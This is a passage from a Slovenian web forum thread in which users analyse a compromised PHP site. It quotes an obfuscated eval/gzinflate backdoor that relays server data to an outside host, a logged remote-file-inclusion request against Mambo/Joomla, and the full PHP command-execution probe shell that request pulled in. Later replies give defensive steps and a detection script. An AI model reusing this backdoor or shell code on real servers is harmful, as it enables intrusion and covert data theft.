").$SSSSS.$SSSSSSSSSSS.eval("return \"".SSSSSSS("c0xOTi0o0XXOSCwqTi2xUgAA")."\";
").$_SERVER[SSSSSSS("8wgJCYh3dHZ2DQiJd/ZwDAp2DQEA")].$SSSSSSSSSSS.eval("return \"".SSSSSSS("c0xOTi0o0fVJzEsvTUxPtVIAAA==")."\";
").$_SERVER[SSSSSSS("8wgJCYh3dHZ2DQiJ93H0cw91dHcFAA==")].$SSSSSSSSSSS.eval("return \"".SSSSSSS("Cy1OLdJ1TE/NK7FSAAA=")."\";
").$_SERVER[SSSSSSS("8wgJCYgPDXYNind0d/ULAQA=")].$SSSSSSSSSSS.eval("return \"".SSSSSSS("C0pNSy1KLbJSAAA=")."\";
").urlencode($_SERVER[SSSSSSS("8wgJCYgPDXYNig9ydXMNcg0CAA==")]).$SSSSSSSSSSS.eval("return \"".SSSSSSS("c87Py0tNLsnMz7NScM7JL04FAA==")."\";
").$SSSSSSSSSSS.$SSSSSSSSSSS)){@fclose($SSSSSSSS);
return false;
}$SSSSSSSSSSSS=0;
$SSSSSSSSSSSSS=SSSSSSS("AwA=");
$SSSSSSSSSSSSSS=SSSSSSS("AwA=");
while(!@feof($SSSSSSSS)){$SSSSSSSSSSSSS.=@fread($SSSSSSSS,2048*4);
if($SSSSSSSSSSSS===0){$SSSSSSSSSSSS=false;
if(substr($SSSSSSSSSSSSS,9,3)!=SSSSSSS("MzIwAAA=")){@fclose($SSSSSSSS);
return false;
}}if(!$SSSSSSSSSSSS){if(($SSSSSSSSSSSSSSS=strpos($SSSSSSSSSSSSS,eval("return \"".SSSSSSS("iymKyYsBYgA=")."\";
")))!==false){$SSSSSSSSSSSSSS.=substr($SSSSSSSSSSSSS,0,$SSSSSSSSSSSSSSS);
$SSSSSSS.=substr($SSSSSSSSSSSSS,$SSSSSSSSSSSSSSS+4);
$SSSSSSSSSSSSS=SSSSSSS("AwA=");
$SSSSSSSSSSSS=true;
}else{$SSSSSSSSSSSSSS.=$SSSSSSSSSSSSS;
}}else{$SSSSSSS.=$SSSSSSSSSSSSS;
$SSSSSSSSSSSSS=SSSSSSS("AwA=");
}}@fclose($SSSSSSSS);
foreach(explode(eval("return \"".SSSSSSS("i8kDAA==")."\";
"),$SSSSSSSSSSSSSS)as $SSSSSSSSSSSSSSSS){if($SSSSSSSSSSSSSSSS=trim($SSSSSSSSSSSSSSSS)){if(count($SSSSSSSSSSSSSSS=explode(SSSSSSS("swIA"),$SSSSSSSSSSSSSSSS))==2){@header($SSSSSSSSSSSSSSSS,true);
if(substr(trim($SSSSSSSSSSSSSSS[1]),0,4)==SSSSSSS("K0mtKAEA")){$SSSSSSS=preg_replace(SSSSSSS("09fIKEpNqykuSta01YhWAgA=").eval("return \"".SSSSSSS("UwcA")."\";
").SSSSSSS("i9WM0YvR14iOUwIA").eval("return \"".SSSSSSS("UwcA")."\";
").SSSSSSS("i9XStI8x0s8sBgA="),SSSSSSS("izG0jTGyr0jLs40xjjECAA=="),$SSSSSSS);
$SSSSSSS=preg_replace(SSSSSSS("07fJTS1JVMgoKSnQTS0szSyzVSpKTStKLc5Qio6zi9Wyt9PPLAYA"),SSSSSSS("s8lNLUlUyCgpKdBNLSzNLLNVKkpNK0otzlBSSM7PK0nNK7FVMjMwsFYIDfKxBQA=").urldecode($_SERVER[SSSSSSS("C3INDHUNDokPDfIEAA==")]).SSSSSSS("U7IDAA=="),$SSSSSSS);
$SSSSSSS=preg_replace(SSSSSSS("009MLsnMz7NVKk5NLErO0CvIKFDSzywGAA=="),SSSSSSS("AwA="),$SSSSSSS);
$SSSSSSS=preg_replace(SSSSSSS("089NLcnIT7FVKsgvLlHSzywGAA=="),SSSSSSS("y00tychPsVVKTy1RAgA="),$SSSSSSS);
}}}}unset($SSSSSSSSSSSSSS);
return $SSSSSSS;
}return false;
}function SSSSSSS($v){return eval(base64_decode("cmV0dXJuIGd6aW5mbGF0ZShiYXNlNjRfZGVjb2RlKCR2KSk7"));
}

?>

A je komu kaj več jasno? :)

#2vsi tisti stringi v stilu "089NLcnIT7FVKsgvLlHSzywGAA==" so ( zazipani in ) base64 encodani... te stringe potem eval-a tako da se ne da rečt kaj počne

base64 lahko odkodiraš npr tuki: http://www.motobit.com/util/base64-decoder-encoder.asp

npr zadnja funkcija s 7 "S" evala string "return gzinflate(base64_decode($v));"

skripto nadomesti z php skripto ki pošlje podatke človeka ki uleti na njo na tvoj email, ki je na nekem drugem serverju.

Odvisno od tega kako je server nastavljen ampak dostopal so lahko do vsega do čegar lahko tvoj PHP. Če lahko php dostopa do comand lina potem so lahko mel tud "simuliran" ssh dostop.

#3a se da kako konfigurirat httpd.conf s kakim regex-om, da se onemogoči php v vseh mapah, ki se začnejo z uploads/ ?

#4<Directory ~ "^/var/www/html(.*?)upload(.*?)">
AddHandler default-handler php
</Directory>
tkole dela

#5Takole pa zgledajo logi:

==0d239948==============================
Request: domena.com 88.86.113.194 - - [18/Jan/2009:04:51:17 +0100] "GET /uploads/index.php?_REQUEST=&_REQUEST[option]=com_conte
nt&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 403 402 "-" "Mozilla/4.61 [en] (
OS/2; U)" t@qwWFu5wUAAATCwdiQAAAAH "-"

tole je pač en neuspeli poskus, ker site ni na mambo-joomli cms-ji

vsebina xml fajla je pa taka:<html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}
else{
ini_restore("safe_mode");
ini_restore("open_basedir");
if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){
echo("Safe Mode of this Server is : ");
echo("SafemodeOFF");
}else{
echo("Safe Mode of this Server is : ");
echo("SafemodeON");
}
}
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
exit;
Komu se da v nedeljo sploh hekat strani ?!?!??!

#6

Komu se da v nedeljo sploh hekat strani ?!?!??!

A misliš da sedijo zraven škatle in gledajo ali bo hack uspel LOL

Btw.
Če bi imeli malo bolj poskrbljeno za varnost se to ne bi dogajalo... Takšnih zahtevkov je na dan tisoče ... :)

#7Ah ja, skriptice? Po možnosti plačljive, ki jih kaki hacker zrihta, potem pa je noter polno evalov :). No sej tudi pri WP templatih se dogaja to ... :)

V nedeljo? Lahko bi bilo tudi kateri drug dan, dolgčas verjetno ...

#8janko: Hvala

dbMG: hvala za super post... res si car

hexer: jah... :) v nedeljo je bilo

#9Jah :D

Razkodiraj do konca pa vrži ven če ne rabiš te kode, samo verjetno je kak footer al pa kaj noter, nekaj kar bi te odvrnilo od tega da odstraniš. Je pa priporočljivo, da odstraniš .... :)

#10Je že vse iz backupov obnovljeno in luknja zavarovana(v vseh direktorijih kjer se lahko uploada, php ne dela. Upam da je to dovolj). Zlobna koda je odstranjena v celoti iz serevrja. Uploader že preverja mime/type, vendar se ga da prek browserja sfjekat, je treba server side preverjat - http://si2.php.net/finfo_file

Če bi kdo rad skeniral svoj server je tukaj python skripta.import os, glob
stuff = os.popen("find /var/www/html/* -name '*.php'");
for item in stuff:
f = open(os.path.normpath(item.strip())).read()
if 'eval(' in f and 'base64_decode' in f and 'gzinflate' in f:
print 'stuff! [' + item.strip() + ']'LP